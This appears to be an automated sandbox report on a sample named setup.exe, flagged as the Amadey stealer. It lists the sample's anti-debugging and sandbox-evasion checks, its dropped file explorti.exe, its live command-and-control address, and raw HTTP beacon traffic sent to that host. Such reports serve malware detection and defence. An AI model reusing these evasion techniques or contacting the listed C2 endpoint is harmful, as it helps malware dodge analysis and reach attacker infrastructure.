Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0806 second address: 4DA084F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CDD6571h 0x0000000f xchg eax, esi 0x00000010 jmp 00007FF32CDD656Eh 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 mov eax, 3666D7ADh 0x0000001c push eax 0x0000001d push edx 0x0000001e mov edx, esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA084F second address: 4DA0877 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 1B0168EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov cl, dl 0x0000000e mov esi, 576EE9BFh 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB7201h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0877 second address: 4DA0919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [7743B370h] 0x0000000e jmp 00007FF32CDD656Eh 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 pushad 0x00000017 movzx ecx, dx 0x0000001a call 00007FF32CDD6573h 0x0000001f pushad 0x00000020 popad 0x00000021 pop esi 0x00000022 popad 0x00000023 xor eax, ebp 0x00000025 pushad 0x00000026 mov al, 9Eh 0x00000028 popad 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FF32CDD6572h 0x00000030 jmp 00007FF32CDD6572h 0x00000035 popad 0x00000036 mov dword ptr [esp], eax 0x00000039 jmp 00007FF32CDD6570h 0x0000003e lea eax, dword ptr [ebp-10h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF32CDD6577h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0919 second address: 4DA0960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CFB71FFh 0x00000009 or ax, A41Eh 0x0000000e jmp 00007FF32CFB7209h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr fs:[00000000h], eax 0x0000001f pushad 0x00000020 mov eax, 0E068F39h 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0960 second address: 4DA0A94 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6570h 0x00000008 sbb cl, 00000048h 0x0000000b jmp 00007FF32CDD656Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov esi, dword ptr [ebp+08h] 0x00000017 jmp 00007FF32CDD6576h 0x0000001c mov eax, dword ptr [esi+10h] 0x0000001f jmp 00007FF32CDD6570h 0x00000024 test eax, eax 0x00000026 pushad 0x00000027 mov ax, 806Dh 0x0000002b mov bx, ax 0x0000002e popad 0x0000002f jne 00007FF39F3758CEh 0x00000035 jmp 00007FF32CDD6574h 0x0000003a sub eax, eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FF32CDD6577h 0x00000043 sbb ch, FFFFFFFEh 0x00000046 jmp 00007FF32CDD6579h 0x0000004b popfd 0x0000004c push esi 0x0000004d pushfd 0x0000004e jmp 00007FF32CDD6577h 0x00000053 sbb cl, 0000000Eh 0x00000056 jmp 00007FF32CDD6579h 0x0000005b popfd 0x0000005c pop ecx 0x0000005d popad 0x0000005e mov dword ptr [ebp-20h], eax 0x00000061 jmp 00007FF32CDD6577h 0x00000066 mov ebx, dword ptr [esi] 0x00000068 jmp 00007FF32CDD6576h 0x0000006d mov dword ptr [ebp-24h], ebx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FF32CDD6577h 0x00000077 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31EFBC second address: 31E7EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d cld 0x0000000e mov dword ptr [ebp+122D1CC1h], edi 0x00000014 popad 0x00000015 push dword ptr [ebp+122D0B15h] 0x0000001b mov dword ptr [ebp+122D1C24h], ebx 0x00000021 call dword ptr [ebp+122D26DAh] 0x00000027 pushad 0x00000028 sub dword ptr [ebp+122D1B97h], ecx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1B97h], eax 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007FF32CFB7208h 0x0000003f mov dword ptr [ebp+122D34ECh], eax 0x00000045 mov dword ptr [ebp+122D1B97h], eax 0x0000004b mov esi, 0000003Ch 0x00000050 jp 00007FF32CFB71F7h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FF32CFB7209h 0x0000005f lodsw 0x00000061 clc 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 clc 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b pushad 0x0000006c mov dword ptr [ebp+122D1B97h], ecx 0x00000072 sub eax, dword ptr [ebp+122D3414h] 0x00000078 popad 0x00000079 nop 0x0000007a pushad 0x0000007b jbe 00007FF32CFB71FCh 0x00000081 jp 00007FF32CFB71F6h 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31E7EC second address: 31E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF32CDD6566h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 479D49 second address: 479D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF32CFB7205h 0x0000000a jl 00007FF32CFB71F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495EAE second address: 495EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495EB2 second address: 495F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7206h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF32CFB7208h 0x00000011 jmp 00007FF32CFB7209h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495F02 second address: 495F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495F07 second address: 495F0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 496060 second address: 49609F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF32CDD656Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007FF32CDD6566h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jnc 00007FF32CDD6566h 0x0000001f popad 0x00000020 jmp 00007FF32CDD6575h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 4961D3 second address: 4961E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jne 00007FF32CFB71F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 498DBA second address: 498E34 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF32CDD6571h 0x0000000f popad 0x00000010 add dword ptr [esp], 0C9E1D41h 0x00000017 jc 00007FF32CDD6569h 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FF32CDD6568h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c push 00000000h 0x0000003e mov esi, edx 0x00000040 mov cx, E9AAh 0x00000044 push 00000003h 0x00000046 mov edi, dword ptr [ebp+122D26E0h] 0x0000004c push 6C589B65h 0x00000051 pushad 0x00000052 jnc 00007FF32CDD656Ch 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 498E34 second address: 498E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: C8E792 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: C8E835 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: E2F857 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: E3CFB4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: EC77FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 31E792 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 31E835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 4BF857 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 4CCFB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 5577FB instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04DF04DA rdtsc

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 408	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 499	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 8164	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4416	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4416	Thread sleep time: -98049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1424	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1424	Thread sleep time: -78039s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2740	Thread sleep count: 408 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2740	Thread sleep time: -12240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3660	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep count: 499 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep time: -998499s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep count: 8164 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep time: -16336164s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: explorti.exe, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001719000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: explorti.exe, 0000000A.00000002.3368400813.000000000174B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.2185921092.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000002.00000002.2229049085.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000003.00000002.2230169054.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\setup.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\setup.exe

Process information queried: ProcessInformation

Hides threads from debuggers

Anti Debugging

Source: C:\Users\user\Desktop\setup.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04DF04DA rdtsc

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002E645B mov eax, dword ptr fs:[00000030h]		10_2_002E645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002EA1C2 mov eax, dword ptr fs:[00000030h]		10_2_002EA1C2

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\setup.exe

Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Contains functionality to query CPU information (cpuid)

Source: explorti.exe, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: 35Program Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002CD312 cpuid

10_2_002CD312

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation

Yara detected Amadeys stealer DLL

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002CCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

10_2_002CCB1A

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002B65B0 LookupAccountNameA,

10_2_002B65B0

Stealing of Sensitive Information

Source: Yara match	File source: 3.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.setup.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2228974412.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2724598095.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2189691685.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2188519642.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2184897638.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2230067978.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2141203577.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.19	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php	true	Avira URL Cloud: phishing	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: setup.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpt	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpN	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php8	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpC	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpa	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpr	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpo	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpm32	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: explorti.exe.5616.10.memstrmin

Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: setup.exe

ReversingLabs: Detection: 62%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: setup.exe

Joe Sandbox ML: detected

C2 URLs / IPs found in malware configuration

Source: setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Malware configuration extractor

IPs: 185.215.113.19

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
